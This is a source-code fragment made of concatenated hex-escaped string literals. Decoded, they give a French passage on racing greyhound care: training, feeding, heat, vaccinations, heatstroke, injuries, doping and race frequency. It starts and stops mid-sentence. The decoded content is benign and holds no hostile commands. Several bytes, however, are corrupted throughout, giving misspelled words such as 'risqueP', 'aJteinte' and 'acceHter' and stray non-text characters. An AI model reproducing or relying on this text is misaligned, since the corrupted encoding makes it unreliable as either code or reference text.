+"\x20\x76\x6f\x75\x73\x20\x74\x65\x6e\x65\x7a\x20\xe0\x20\x70\x61"
+"\x72\x74\x69\x72\x20\x74\xf4\x74\x2e\x0d\x0d\x45\x6e\x74\x72\x65"
+"\x74\x69\x65\x6e\x20\x3a\x0d\x4c\x65\x73\x20\x70\x72\x6f\x62\x6c"
+"\xe8\x6d\x65\x73\x20\x64\x65\x20\x6c\x27\x65\x6e\x74\x72\x61\xee"
+"\x6e\x65\x6d\x65\x6e\x74\x2c\x20\x64\x65\x20\x6c\x27\x61\x6c\x69"
+"\x6d\x65\x6e\x74\x61\x74\x69\x6f\x6e\x2c\x20\x64\x65\x73\x20\x73"
+"\x6f\x69\x6e\x73\x20\x73\x6f\x75\x6c\xe8\x76\x65\x6e\x74\x20\x62"
+"\x65\x61\x75\x63\x6f\x75\x70\x20\x64\x65\x20\x63\x6f\x6e\x74\x72"
+"\x6f\x76\x65\x72\x73\x65\x73\x2c\x20\x63\x68\x61\x63\x75\x6e\x20"
+"\x61\x79\x61\x6e\x74\x20\x73\x61\x20\x72\x65\x63\x65\x74\x74\x65"
+"\x2c\x20\x70\x61\x72\x66\x6f\x69\x73\x20\x73\x61\x20\x74\x68\xe9"
+"\x6f\x72\x69\x65\x2e\x0d\x0d\x45\x6e\x74\x72\x61\xee\x6e\x65\x6d"
+"\x65\x6e\x74\x20\x3a\x0d\x54\x6f\x75\x74\x20\x65\x6e\x74\x72\x61"
+"\xee\x6e\x65\x6d\x65\x6e\x74\x20\x63\x6f\x6d\x70\x72\x65\x6e\x64"
+"\x20\x75\x6e\x20\x74\x72\x61\x76\x61\x69\x6c\x20\x68\x69\x76\x65"
+"\x72\x6e\x61\x6c\x20\x64\x65\x20\x66\x6f\x6e\x64\x2c\x20\x64\x65"
+"\x73\x20\x70\x68\x61\x73\x65\x73\x20\x64\x65\x20\x74\x72\x61\x76"
+"\x61\x69\x6c\x20\x6d\x6f\x64\xe9\x72\xe9\x20\x28\x6d\x61\x72\x63"
+"\x68\x65\x2c\x20\x74\x72\x6f\x74\x29\x2c\x20\x64\x65\x73\x20\x70"
+"\x68\x61\x73\x65\x73\x20\x64\x65\x20\x76\x69\x74\x65\x73\x73\x65"
+"\x20\x28\x6c\x65\x75\x72\x72\x65\x2c\x20\x62\x61\x6c\x6c\x65\x2c"
+"\x20\x73\x70\x72\x69\x6e\x74\x2c\x20\x65\x74\x63\x2e\x2e\x2e\x29"
+"\x2e\x20\x4c\x65\x20\x64\x6f\x73\x61\x67\x65\x20\x76\x61\x72\x69"
+"\x65\x20\x73\x65\x6c\x6f\x6e\x20\x6c\x61\x20\x72\x61\x63\x65\x20"
+"\x28\x6c\x65\x20\x67\x72\x65\x79\x68\x6f\x75\x6e\x64\x2c\x20\x70"
+"\x6c\x75\x73\x20\x72\x61\x70\x69\x64\x65\x2c\x20\x65\x73\x74\x20"
+"\x6d\x6f\x69\x6e\x73\x20\x72\xe9\x73\x69\x73\x74\x61\x6e\x74\x20"
+"\x71\x75\x65\x20\x6c\x65\x73\x20\x61\x75\x74\x72\x65\x73\x29\x2c"
+"\x20\x6c\x27\xe9\x70\x6f\x71\x75\x65\x2c\x20\x6c\x27\x69\x6e\x64"
+"\x69\x76\x69\x64\x75\x2e\x0d\x43\x65\x72\x74\x61\x69\x6e\x73\x20"
+"\x6f\x6e\x74\x20\x62\x65\x73\x6f\x69\x6e\x20\x64\x65\x20\x62\x65"
+"\x61\x75\x63\x6f\x75\x70\x20\x64\x27\x65\x6e\x74\x72\x61\xee\x6e"
+"\x65\x6d\x65\x6e\x74\x2c\x20\x64\x27\x61\x75\x74\x72\x65\x73\x20"
+"\x70\x65\x75\x2c\x20\x6d\x61\x69\x73\x20\x69\x6c\x20\x6e\x27\x79"
+"\x20\x61\x20\x67\x75\xe8\x72\x65\x20\x64\x65\x20\x62\x6f\x6e\x73"
+"\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20\x73\x61\x6e\x73\x20"
+"\x65\x66\x66\x6f\x72\x74\x73\x20\x64\x75\x20\x70\x72\x6f\x70\x72"
+"\x69\xe9\x74\x61\x69\x72\x65\x2e\x0d\x49\x6c\x20\x66\x61\x75\x74"
+"\x20\x64\x75\x20\x74\x65\x6d\x70\x73\x2c\x20\x61\x75\x20\x6d\x6f"
+"\x69\x6e\x73\x20\x74\x72\x6f\x69\x73\x20\x73\x65\x6d\x61\x69\x6e"
+"\x65\x73\x2c\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x70\x6c\x75\x73"
+"\x69\x65\x75\x72\x73\x20\x6d\x6f\x69\x73\x20\x70\x6f\x75\x72\x20"
+"\x6d\x65\x74\x74\x72\x65\x20\x75\x6e\x20\x6c\xe9\x76\x72\x69\x65"
+"\x91\x20\x65\x6e\x20\x66\x6f\x72\x6d\x65\x2e\x20\x4c\x65\x73\x20"
+"\x72\x69\x73\x71\x75\x65\x50\x20\x64\x65\x20\x62\x6c\x65\x73\x73"
+"\x75\x72\x65\x73\x20\x73\x6f\x6e\x74\x20\xe9\x6c\x65\x76\xe9\x73"
+"\x20\x65\x6e\x20\x63\x61\x73\x20\x64\x65\x20\x6d\xe9\x66\x6f\x72"
+"\x6d\x65\x20\x6f\x75\x20\x64\x65\x20\x73\x75\x70\x65\x72\x20\x63"
+"\x6f\x6e\x64\x69\x74\x69\x6f\x6e\x2e\x0d\x42\x65\x61\x75\x63\x6f"
+"\x75\x70\x20\x28\x6d\x61\x69\x73\x20\x70\x61\x73\x20\x74\x6f\x75"
+"\x74\x65\x73\x29\x20\x20\x64\x65\x20\x66\x65\x6d\x65\x6c\x6c\x65"
+"\x73\x20\x61\x6d\xe9\x6c\x69\x6f\x72\x65\x6e\x74\x20\x6c\x65\x75"
+"\x72\x20\x76\x69\x74\x65\x73\x73\x65\x20\x61\x76\x61\x6e\x74\x20"
+"\x6c\x65\x73\xd8\x63\x68\x61\x6c\x65\x75\x72\x73\x2c\x20\x65\x74"
+"\x20\x62\x61\x69\x73\x73\x65\x6e\x74\x20\x64\x65\x20\x66\x6f\x72"
+"\x6d\x65\x20\x70\x65\x6e\x64\x61\x6e\x74\x20\x71\x75\x61\x74\x72"
+"\x65\x20\xe0\x20\x68\x75\x69\x74\x20\x73\x65\x6d\x61\x69\x6e\x65"
+"\x73\x20\x61\x70\x72\xe8\x73\x20\x6c\x65\x20\x6d\x69\x6c\x69\x65"
+"\x75\x20\x64\x65\x73\x20\x63\x68\x61\x6c\x65\x75\x72\x73\x2e\x20"
+"\x4c\x61\x20\x76\x69\x74\x65\x73\x73\x65\x20\x6d\x61\x78\x69\x6d"
+"\x75\x6d\x20\x65\x73\x74\x20\x61\x4a\x74\x65\x69\x6e\x74\x65\x20"
+"\x76\x65\x72\x73\x20\x31\x32\x20\x2d\x20\x31\x35\x20\x6d\x6f\x69"
+"\x73\x2c\x20\x6d\x61\x69\x73\x20\x61\x76\x65\x63\x20\x6c\x65\x20"
+"\x6d\xe9\x74\x69\x65\x72\x2c\x20\x6c\x65\x73\x20\x6d\x65\x69\x6c"
+"\x6c\x65\x75\x72\x73\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20"
+"\x73\x6f\x6e\x74\x20\x64\x65\x20\x32\x20\xe0\x20\x35\x20\x61\x6e"
+"\x73\x2e\x20\x0d\x50\x61\x73\x73\xe9\x20\x73\x69\x78\x20\x61\x6e"
+"\x73\x2c\x20\x6c\x65\x20\x6c\xe9\x76\x72\x69\x65\x72\x20\x62\x61"
+"\x69\x73\x73\x65\x2e\x0d\x0d\x0d\x0d\x0d\x41\x6c\x69\x6d\x65\x6e"
+"\x74\x61\x74\x69\x6f\x6e\x20\x3a\x0d\x0d\x45\x6c\x6c\x65\x20\x70"
+"\x65\x75\x74\x20\xea\x74\x72\x65\x20\x74\x72\x61\x64\x69\x74\x69"
+"\x6f\x6e\x6e\x65\x6c\x6c\x65\x2c\x20\x73\x61\x6e\x73\x20\x74\x72"
+"\x6f\x70\x20\x64\x65\x20\x6c\xe9\x67\x75\x6d\x65\x73\x20\x6f\x75"
+"\x20\x64\x65\x20\x66\xe9\x63\x75\x6c\x65\x6e\x74\x73\x2c\x20\x6f"
+"\x75\x20\xe0\x20\x62\x61\x73\x65\x20\x64\x27\x61\x6c\x69\x6d\x65"
+"\x6e\x74\x73\x20\x64\x75\x20\x63\x6f\x6d\x6d\x65\x72\x63\x65\x2e"
+"\x20\x49\x6c\x20\x76\x61\x75\x74\x20\x6d\x69\x65\x75\x78\x20\x64"
+"\x65\x75\x78\x20\x6f\x75\x20\x74\x72\x6f\x69\x73\x20\x72\x65\x70"
+"\x61\x73\x20\x70\x61\x72\x20\x6a\x6f\x75\x72\x20\x71\x75\x27\x75"
+"\x6e\x20\x73\x65\x75\x6c\x2e\x20\x41\x74\x74\x65\x6e\x74\x69\x6f"
+"\x6e\x20\x61\x75\x78\x20\x65\x78\x63\xe8\x73\x20\x64\x65\x20\x63"
+"\x61\x6c\x63\x69\x75\x6d\x2c\x20\x64\x65\x20\x70\x68\x6f\x73\x70"
+"\x68\x6f\x72\x65\x2c\x20\x64\x65\x20\x76\x69\x74\x61\x6d\x69\x6e"
+"\x65\x73\x20\x44\x2e\x20\x4e\x65\x20\x64\x6f\x6e\x6e\x65\x7a\x20"
+"\x70\x61\x73\x20\x75\x6e\x20\x72\x65\x70\x61\x73\x20\x63\x6f\x6d"
+"\x70\x6c\x65\x74\x20\x6c\x65\x20\x6a\x6f\x75\x72\x20\x64\x65\x73"
+"\x20\x63\x6f\x75\x72\x73\x65\x73\x2e\x0d\x46\x61\x69\x74\x65\x73"
+"\x20\x62\x6f\x69\x72\x65\x20\x6d\x6f\x64\xe9\x72\xe9\x6d\x65\x6e"
+"\x74\x2c\x20\x64\x65\x20\x6c\x27\x65\x61\x75\x20\x6e\x6f\x6e\x20"
+"\x67\x6c\x61\x63\xe9\x65\x2c\x20\x61\x70\x72\xe8\x73\x20\x6c\x65"
+"\x96\x20\x63\x6f\x75\x72\x73\x65\x73\x2e\x0d\x0d\x53\x6f\x69\x6e"
+"\x73\x20\x3a\x0d\x0d\x09\x43\x68\x61\x6c\x65\x75\x72\x73\x20\x3a"
+"\x0d\x49\x6c\x20\x65\x73\x74\x20\x69\x6e\x74\x65\x72\x64\x69\x74"
+"\x20\x64\x27\x61\x6d\x65\x6e\x65\x72\x20\x75\x6e\x65\x20\x66\x65"
+"\x6d\x65\x6c\x6c\x65\x20\x65\x6e\x20\x63\x68\x61\x6c\x65\x75\x72"
+"\x73\x20\x61\x75\x20\x63\x79\x6e\x6f\x64\x72\x6f\x6d\x65\x2c\x20"
+"\x63\x65\x6c\x61\x20\x76\x61\x20\x70\x65\x72\x74\x75\x72\x62\x65"
+"\x72\x20\x6d\xe2\x6c\x65\x73\x20\x65\x74\x20\x66\x65\x6d\x65\x6c"
+"\x6c\x65\x73\x2e\x0d\x0d\x09\x56\x61\x63\x63\x69\x6e\x73\x3a\x0d"
+"\x4c\x61\x20\x76\x61\x63\x63\x69\x6e\x61\x74\x69\x6f\x6e\x20\x61"
+"\x6e\x74\x69\x72\x61\x62\x69\x71\x75\x65\x20\x65\x73\x74\x20\x6f"
+"\x62\x6c\x69\x67\x61\x74\x6f\x69\x72\x65\x2e\x0d\x4c\x65\x73\x20"
+"\x76\x61\x63\x63\x69\x6e\x61\x74\x69\x6f\x6e\x73\x20\x63\x6f\x75"
+"\x72\x61\x6e\x74\x65\x73\x20\x73\x6f\x6e\x74\x20\xe0\x20\x63\x6f"
+"\x6e\x73\x65\x69\x6c\x6c\x65\x72\x2e\x0d\x0d\x09\x4d\x61\x73\x73"
+"\x61\x67\x65\x73\x20\x65\x74\x20\xe9\x63\x68\x61\x75\x66\x66\x65"
+"\x6d\x65\x6e\x74\x20\x3a\x0d\x49\x6c\x73\x20\x73\x6f\x6e\x74\x20"
+"\xe0\x20\x63\x6f\x6e\x73\x65\x69\x6c\x6c\x65\x72\x2c\x20\x63\x6f"
+"\x6d\x6d\x65\x20\x6c\x61\x20\x64\xe9\x74\x65\x6e\x74\x65\x20\x61"
+"\x70\x72\xe8\x73\x20\x6c\x61\x20\x63\x6f\x75\x72\x73\x65\x2e\x0d"
+"\x0d\x09\x54\xe9\x74\x61\x6e\x69\x65\x20\x3a\x0d\x43\x72\x69\x73"
+"\x65\x20\x6e\x65\x72\x76\x65\x75\x73\x65\x20\x73\x6f\x69\x74\x20"
+"\x61\x70\x72\xe8\x73\x20\x6c\x61\x20\x63\x6f\x75\x72\x73\x65\x20"
+"\x28\x73\x70\x65\x63\x74\x61\x63\x75\x6c\x61\x69\x72\x65\x20\x65"
+"\x74\x20\x62\x72\xe8\x76\x65\x29\x20\x73\x6f\x69\x74\x20\x70\x65"
+"\x6e\x64\x61\x6e\x74\x20\x6c\x61\x20\x6c\x61\x63\x74\x61\x74\x69"
+"\x6f\x6e\x2c\x20\x73\x75\x72\x74\x6f\x75\x74\x20\x20\x73\x69\x20"
+"\x76\x6f\x75\x73\x20\x61\x76\x65\x7a\x20\x64\x6f\x6e\x6e\xe9\x20"
+"\x64\x65\x73\x20\x73\x75\x70\x70\x6c\xe9\x6d\x65\x6e\x74\x73\x20"
+"\x64\x65\x20\x63\x61\x6c\x63\x69\x75\x6d\x20\x70\x65\x6e\x64\x61"
+"\x6e\x74\x20\x6c\x61\x20\x67\x65\x73\x74\x61\x74\x69\x6f\x6e\x2e"
+"\x0d\x0d\x09\x50\x69\x73\x73\x65\x6d\x65\x6e\x74\x20\x64\x65\x20"
+"\x73\x61\x6e\x67\x20\x28\x72\x68\x61\x62\x64\x6f\x6d\x79\x6f\x6c"
+"\x79\x73\x65\x29\x3a\x0d\x55\x72\x69\x6e\x65\x73\x20\x62\x72\x75"
+"\x6e\x65\x73\x20\x74\x72\x61\x64\x75\x69\x73\x61\x6e\x74\x20\x73"
+"\x6f\x69\x74\x20\x75\x6e\x65\x20\x70\x69\x72\x6f\x70\x6c\x61\x73"
+"\x6d\x6f\x73\x65\x2c\x20\x73\x6f\x69\x74\x20\x64\x65\x73\x20\x6d"
+"\x69\x63\x72\x6f\x63\x6c\x61\x71\x75\x61\x67\x65\x73\x20\x65\x6e"
+"\x20\x63\x6f\x75\x72\x73\x65\x73\x2c\x20\x73\x6f\x69\x74\x20\x75"
+"\x6e\x65\x20\x61\x75\x74\x72\x65\x20\x6d\x61\x6c\x61\x64\x69\x65"
+"\x2e\x0d\x0d\x09\x43\x6f\x75\x70\x20\x64\x65\x20\x63\x68\x61\x6c"
+"\x65\x75\x72\x20\x3a\x0d\x41\x63\x63\x69\x64\x65\x6e\x74\x20\x67"
+"\xe7\x61\x76\x65\x20\x61\x70\x72\xe8\x73\x20\x6c\x61\x20\x63\x6f"
+"\x75\x72\x73\x65\x2c\x20\x73\x27\x69\x6c\x20\x66\x61\x69\x74\x20"
+"\x63\x68\x61\x75\x64\x2c\x20\x73\x27\x69\x6c\x20\x79\x20\x61\x20"
+"\x65\x75\x20\x63\x65\x72\x74\x61\x69\x6e\x73\x20\x64\x6f\x70\x61"
+"\x6e\x74\x73\x2c\x20\x73\x69\x20\x6c\x65\x20\x73\x75\x6a\x65\x74"
+"\x20\x65\x73\x74\x20\x65\x6e\x20\x6d\x61\x75\x76\x61\x69\x73\x65"
+"\x20\xe9\x74\x61\x74\x2e\x20\x4c\x61\x20\x74\x65\x6d\x70\xe9\x72"
+"\x61\x74\x75\x72\x65\x20\x6d\x6f\x6e\x74\x65\x20\xe0\x20\x70\x6c"
+"\x75\x73\x20\x64\x65\x20\x34\x30\x2e\x20\x52\x65\x66\x72\x6f\x69"
+"\x64\x69\x72\x20\x6c\x65\x20\x63\x6f\x72\x70\x73\x20\x65\x74\x20"
+"\x6c\x61\x20\x74\xea\x74\x65\x20\x65\x74\x20\x70\x6f\x72\x74\x65"
+"\x72\x20\x63\x68\x65\x7a\x20\x75\x6e\x20\x76\xe9\x74\xe9\x72\x69"
+"\x6e\x61\x69\x72\x65\x2e\x0d\x0d\x09\x43\x6c\x61\x71\x75\x61\x67"
+"\x65\x73\x2c\x20\x66\x72\x61\x63\x99\x75\x72\x65\x73\x20\x3a\x0d"
+"\x41\x73\x73\x65\x7a\x20\x72\x61\x72\x65\x73\x2e\x20\x53\x75\x72"
+"\x74\x6f\x75\x74\x20\x73\x75\x72\x20\x70\x69\x73\x74\x65\x73\x20"
+"\x6d\x61\x6c\x20\x65\x6e\x74\x72\x65\x74\x65\x6e\x75\x65\x73\x20"
+"\x61\x76\x65\x63\x20\x7a\x6f\x6e\x65\x73\x20\x64\x75\x72\x65\x73"
+"\x20\x65\x74\x20\x6d\x6f\x6c\x6c\x65\x73\x20\x61\x6c\x74\x65\x72"
+"\x6e\xe9\x65\x73\x2c\x20\x6f\x75\x20\x73\x75\x72\x20\x64\x65\x73"
+"\x20\x63\x68\x69\x65\x6e\x73\x20\x6d\x61\x6c\x20\x6e\x6f\x75\x72"
+"\x72\x69\x73\x20\x65\x74\x20\x6d\x61\x6c\x20\x65\x6e\x74\x72\x61"
+"\xee\x6e\xe9\x73\x2e\x0d\x0d\x09\x47\x72\x6f\x73\x20\x64\x6f\x69"
+"\x67\x74\x73\x20\x3a\x0d\x4c\xe9\x73\x69\x6f\x6e\x73\x20\x61\x72"
+"\x74\x69\x63\x75\x6c\x61\x69\x72\x65\x73\x2c\x20\x74\x61\x6e\x74"
+"\xf4\x74\x20\x65\x6e\x74\x6f\x72\x73\x65\x73\x2c\x20\x74\x61\x6e"
+"\x74\xf4\x74\x20\x74\x65\x6e\x64\x69\x6e\x69\x74\x65\x73\x2c\x20"
+"\x74\x61\x6e\x74\xf4\x74\x20\x66\x6f\x75\x72\x62\x75\x72\x65\x2c"
+"\x20\x73\x75\x72\x20\x63\x68\x69\x65\x6e\x73\x20\x72\x61\x70\x69"
+"\x64\x65\x73\x2c\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x6c\x6f\x75"
+"\x72\x64\x73\x2c\x20\xe0\x20\x6c\x27\x6f\x63\x63\x61\x73\x69\x6f"
+"\x6e\x20\x64\x65\x20\x62\x6f\x75\x73\x63\x75\x6c\x61\x64\x65\x73"
+"\x2c\x20\x64\x65\x20\x6d\x61\x75\x76\x61\x69\x73\x20\x66\x72\x65"
+"\x69\x6e\x61\x67\x65\x20\xe0\x20\x6c\x27\x61\x72\x72\x69\x76\xe9"
+"\x65\x2c\x20\x70\x61\x72\x66\x6f\x69\x73\x20\x64\x65\x20\x70\x69"
+"\x73\x74\x65\x73\x20\x6d\x61\x6c\x20\x65\x6e\x74\x72\x65\x74\x65"
+"\x6e\x75\x65\x73\x2e\x0d\x49\x6c\x73\x20\x73\x75\x72\x76\x69\x65"
+"\x6e\x6e\x65\x6e\x74\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x65\x6e"
+"\x20\x70\x6c\x65\x69\x6e\x65\x20\x73\x61\x69\x73\x6f\x6e\x20\x73"
+"\x75\x72\x20\x6c\x65\x73\x20\x73\x75\x6a\x65\x74\x73\x20\x66\x61"
+"\x74\x69\x67\x75\xe9\x73\x2c\x20\x6d\x61\x6c\x20\x64\xe9\x74\x6f"
+"\x78\x69\x71\x75\xe9\x73\x2e\x0d\x49\x6c\x73\x20\x70\x65\x75\x76"
+"\x65\x6e\x74\x20\xea\x74\x72\x65\x20\x62\xe9\x6e\x69\x6e\x73\x20"
+"\x6f\x75\x20\x67\x72\x61\x76\x65\x73\x2e\x0d\x53\x65\x6c\x6f\x6e"
+"\x20\x6c\x65\x73\x20\x76\xe9\x74\xe9\x72\x69\x6e\x61\x69\x72\x65"
+"\x73\x2c\x20\x6f\x6e\x20\x74\x72\x61\x69\x74\x65\x20\x70\x61\x72"
+"\x20\x63\x68\x69\x72\x75\x72\x67\x69\x65\x2c\x20\x70\x61\x72\x20"
+"\x61\x6e\x74\x69\x69\x6e\x66\x6c\x61\x6d\x6d\x61\x74\x6f\x69\x72"
+"\x65\x73\x2c\x20\x70\x61\x72\x20\x70\x61\x6e\x73\x65\x6d\x65\x6e"
+"\x74\x2c\x20\x70\x61\x72\x20\x68\xe1\x6d\xe9\x6f\x70\x61\x74\x68"
+"\x69\x65\x2e\x20\x43\x68\x61\x71\x75\x65\x20\x6d\xe9\x74\x68\x6f"
+"\x64\x65\x20\x61\x20\x64\x65\x73\x20\x73\x75\x63\x63\xe8\x73\x20"
+"\x6f\x75\x20\x64\x65\x73\x20\xe9\x63\x68\x65\x63\x73\x2c\x20\x73"
+"\x65\x6c\x6f\x6e\x20\x6c\x65\x73\x20\x63\x61\x73\x2e\x20\xe5\x6e"
+"\x20\x61\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x73\x69\x67\x6e\x61"
+"\x6c\xe9\x20\x64\x65\x73\x20\x63\x68\x75\x74\x65\x73\x20\x64\x65"
+"\x20\x66\x6f\x72\x6d\x65\x20\x61\x70\x72\xe8\x73\x20\x63\x6f\x72"
+"\x74\x69\x63\x6f\xef\x64\x65\x73\x2e\x0d\x0d\x09\x44\x6f\x70\x61"
+"\x67\x65\x3a\x0d\x49\x6c\x20\x65\x73\x74\x20\x69\x6e\x74\x65\x72"
+"\x64\x69\x74\x20\x6d\x61\x69\x73\x20\x74\x72\x6f\x70\x20\x75\x74"
+"\x69\x6c\x69\x73\xe9\x2e\x0d\x4c\x61\x20\x70\x6c\x75\x70\x61\x72"
+"\x74\x20\x6e\x27\x6f\x6e\x74\x20\x61\x75\x63\x75\x6e\x65\x20\x61"
+"\x63\x74\x69\x6f\x6e\x2e\x0d\x4c\x65\x73\x20\x64\x6f\x70\x61\x6e"
+"\x74\x73\x20\x73\x6f\x6e\x74\x20\x73\x6f\x69\x74\x20\x64\x65\x73"
+"\x20\x72\x65\x74\x61\x72\x64\x61\x74\x65\x75\x72\x73\x20\x64\x65"
+"\x20\x66\x61\x74\x69\x67\x75\x65\x20\x71\x75\x69\x20\x6e\x27\x6f"
+"\x6e\x74\x20\x64\x27\x69\x6e\x74\xe9\x72\xea\x74\x20\x74\x68\xe9"
+"\x6f\x72\x69\x71\x75\x65\x20\x71\x75\x65\x20\x70\x6f\x75\x72\x20"
+"\x6c\x65\x73\x20\x63\x6f\x75\x72\x73\x65\x73\x20\x64\x65\x20\x70"
+"\x6c\x75\x73\x20\x64\x65\x20\x31\x35\x30\x30\x20\x6d\xe8\x74\x72"
+"\x65\x73\x2c\x20\x73\x6f\x69\x74\x20\x64\x65\x73\x20\x64\xe9\x66"
+"\x61\x74\x69\x67\x61\x6e\x74\x73\x20\x71\x75\x69\x20\x6e\x65\x20"
+"\x73\x65\x72\x76\x65\x6e\x74\x20\x71\x75\x27\x65\x6e\x20\x63\x61"
+"\x73\x20\x64\x65\x20\x72\xe9\x70\xe9\x74\x69\x74\x69\x6f\x6e\x20"
+"\xe0\x20\x69\x6e\x74\x65\x72\x76\x61\x6c\x6c\x65\x73\x20\x69\x6e"
+"\x73\x75\x66\x66\x69\x73\x61\x6e\x74\x73\x2c\x20\x73\x6f\x69\x74"
+"\x20\x64\x65\x73\x20\x70\x6f\x74\x65\x6e\x74\x69\x61\x6c\x69\x73"
+"\x61\x74\x65\x75\x72\x73\x20\xe0\x20\x74\x72\xe8\x73\x20\x63\x6f"
+"\x75\x72\x74\x65\x20\x64\x75\x72\xe9\x65\x20\x64\x27\x61\x63\x74"
+"\x69\x6f\x6e\x2e\x20\x4c\x65\x73\x20\x64\x6f\x70\x61\x6e\x74\x73"
+"\x20\x73\x6f\x6e\x74\x20\x74\x6f\x75\x6a\x6f\x75\x72\x73\x20\x64"
+"\x61\x6e\x67\x65\x72\x65\x75\x78\x20\x70\x6f\x75\x72\x20\x6c\x65"
+"\x20\x6c\xe9\x76\x72\x69\x65\x72\x2c\x20\x65\x74\x20\x69\x6c\x73"
+"\x20\x73\x6f\x6e\x74\x20\x69\x6e\x75\x74\x69\x6c\x65\x73\x20\x73"
+"\x75\x72\x20\x32\x30\x20\x73\x65\x63\x2e\x0d\x0d\x09\x52\x79\x74"
+"\x68\x6d\x65\x20\x64\x65\x73\x20\x63\x6f\x75\x72\x73\x65\x73\x20"
+"\x3a\x0d\x45\x6e\x20\x70\x72\x69\x6e\x63\x69\x70\x65\x2c\x20\x6c"
+"\x65\x20\x6c\xe9\x76\x72\x69\x65\x72\x20\x70\x65\x75\x74\x20\x63"
+"\x6f\x75\x72\x69\x72\x20\x73\x6f\x75\x76\x65\x6e\x74\x2c\x20\x69"
+"\x6c\x20\x65\x73\x74\x20\x62\xe2\x74\x69\x20\x70\x6f\x75\x72\x20"
+"\x63\x65\x6c\x61\x2e\x20\x4d\x61\x69\x73\x20\x65\x6e\x20\x63\x61"
+"\x73\x20\x64\x65\x20\x6c\xe9\x73\x69\x6f\x6e\x20\x69\x6e\x61\x70"
+"\x65\x72\xe7\x75\x65\x20\x69\x6c\x20\x70\x6f\x75\x72\x72\x61\x20"
+"\x79\x20\x61\x76\x6f\x69\x72\x20\x62\x6c\x65\x73\x73\x75\x72\x65"
+"\x20\x65\x74\x20\x6d\xe9\x66\x6f\x72\x6d\x65\x2c\x20\x63\x65\x20"
+"\x71\x75\x69\x20\x63\x6f\x6e\x64\x75\x69\x74\x20\x63\x65\x72\x74"
+"\x61\x69\x6e\x73\x20\xe0\x20\x6e\x65\x20\x72\xe9\x70\xe9\x74\x65"
+"\x72\x20\x6c\x65\x73\x20\x63\x6f\x75\x72\x73\x65\x73\x20\x71\x75"
+"\x65\x20\x72\x61\x72\x65\x6d\x65\x6e\x74\x2e\x20\x42\x69\x65\x6e"
+"\x20\x6e\x6f\x75\x72\x72\x69\x20\x65\x74\x20\x62\x69\x65\x6e\x20"
+"\x65\x6e\x74\x72\x61\xee\x6e\xe9\x2c\x20\x69\x6c\x20\x70\x65\x75"
+"\x20\x63\x6f\x75\x72\x69\x72\x20\x74\x72\xe8\x73\x20\x66\x72\xe9"
+"\x71\x75\x65\x6d\x6d\x65\x6e\x74\x2e\x0d\x4c\x65\x20\x72\x69\x73"
+"\x71\x75\x65\x20\x64\x65\x20\x6c\xe9\x73\x69\x6f\x6e\x20\x69\x6e"
+"\x61\x70\x65\x72\xe7\x75\x65\x20\x65\x73\x74\x20\x66\x69\x6e\x61"
+"\x6c\x65\x6d\x65\x6e\x74\x20\x6c\x65\x20\x70\x72\x69\x6e\x63\x69"
+"\x70\x61\x6c\x20\x63\x61\x73\x20\x63\x61\x72\x20\x69\x6c\x20\x65"
+"\x6e\x74\x72\x61\xee\x6e\x65\x72\x61\x20\x75\x6e\x20\x61\x63\x63"
+"\x69\x64\x65\x6e\x74\x2c\x20\x61\x74\x74\x72\x69\x62\x75\xe9\x20"
+"\xe0\x20\x6c\x61\x20\x70\x69\x73\x74\x65\x2c\x20\x61\x75\x20\x74"
+"\x65\x6d\x70\x73\x2c\x20\xe0\x20\x75\x6e\x20\x61\x63\x63\x69\x64"
+"\x65\x6e\x74\x20\x64\x65\x20\x63\x6f\x75\x72\x73\x65\x2c\x20\x65"
+"\x74\x63\x2e\x2e\x2e\x0d\x41\x70\x72\xe8\x73\x20\x6c\x61\x20\x72"
+"\xe9\x75\x6e\x69\x6f\x6e\x20\x65\x78\x61\x6d\x69\x6e\x65\x7a\x20"
+"\x65\x74\x20\x6e\x65\x74\x74\x6f\x79\x65\x7a\x20\x6c\x65\x73\x20"
+"\x70\x69\x65\x64\x73\x2c\x20\x70\x61\x6c\x70\x65\x7a\x20\x62\x69"
+"\x65\x6e\x20\x6c\x65\x73\x20\xe9\x70\x61\x75\x6c\x65\x73\x2c\x20"
+"\x6c\x65\x73\x20\x63\x75\x69\x73\x73\x65\x73\x2c\x20\x6c\x65\x73"
+"\x20\x61\x72\x74\x69\x63\x75\x6c\x61\x74\x69\x6f\x6e\x73\x2e\x20"
+"\x45\x6e\x20\x63\x61\x73\x20\x64\x65\x20\x64\x6f\x75\x74\x65\x2c"
+"\x20\x6d\x65\x74\x74\x65\x7a\x20\x6c\x65\x20\xe0\x20\x75\x6e\x20"
+"\x72\x65\x70\x6f\x73\x20\x72\x65\x6c\x61\x74\x69\x66\x20\x28\x70"
+"\x61\x73\x20\x64\x65\x20\x63\x6f\x75\x72\x73\x65\x29\x2e\x0d\x4e"
+"\x65\x20\x6c\x61\x69\x73\x73\x65\x7a\x20\x6a\x61\x6d\x61\x69\x73"
+"\x20\x70\x61\x73\x73\x65\x72\x20\x75\x6e\x20\x6d\x61\x75\x76\x61"
+"\x69\x73\x20\x63\x68\x72\x6f\x6e\x6f\x20\x73\x61\x6e\x73\x20\x63"
+"\x61\x75\x73\x65\x20\x28\x64\x65\x20\x63\x68\x75\x74\x65\x29\x2c"
+"\x20\x73\x6f\x79\x65\x7a\x20\x70\x72\x75\x64\x65\x6e\x74\x20\x70"
+"\x6f\x75\x72\x20\x61\x63\x63\x65\x48\x74\x65\x72\x20\x6c\x61\x20"
+"\x63\x6f\x75\x72\x73\x65\x20\x73\x75\x69\x76\x61\x6e\x74\x65\x2e"
+"\x0d\x43\x27\x65\x73\x74\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x75"
+"\x6e\x20\x73\x69\x67\x6e\x65\x20\x70\x72\xe9\x63\x75\x72\x73\x65"
+"\x75\x72\x20\x64\x27\x65\x6e\x6e\x75\x69\x73\x2e\x20\x55\x6e\x20"
+"\x63\x68\x69\x65\x6e\x20\x62\x69\x65\x6e\x20\x65\x6e\x74\x72\x61"
+"\xee\x6e\xe9\x20\x70\x65\x75\x74\x20\x66\x72\xe9\x71\x75\x65\x6d"
+"\x6d\x65\x6e\x74\x20\x72\xe9\x70\xe9\x74\x65\x72\x20\x73\x65\x73"
+"\x20\x63\x6f\x75\x72\x73\x65\x73\x2e\x20\x55\x6e\x20\x63\x68\x69"
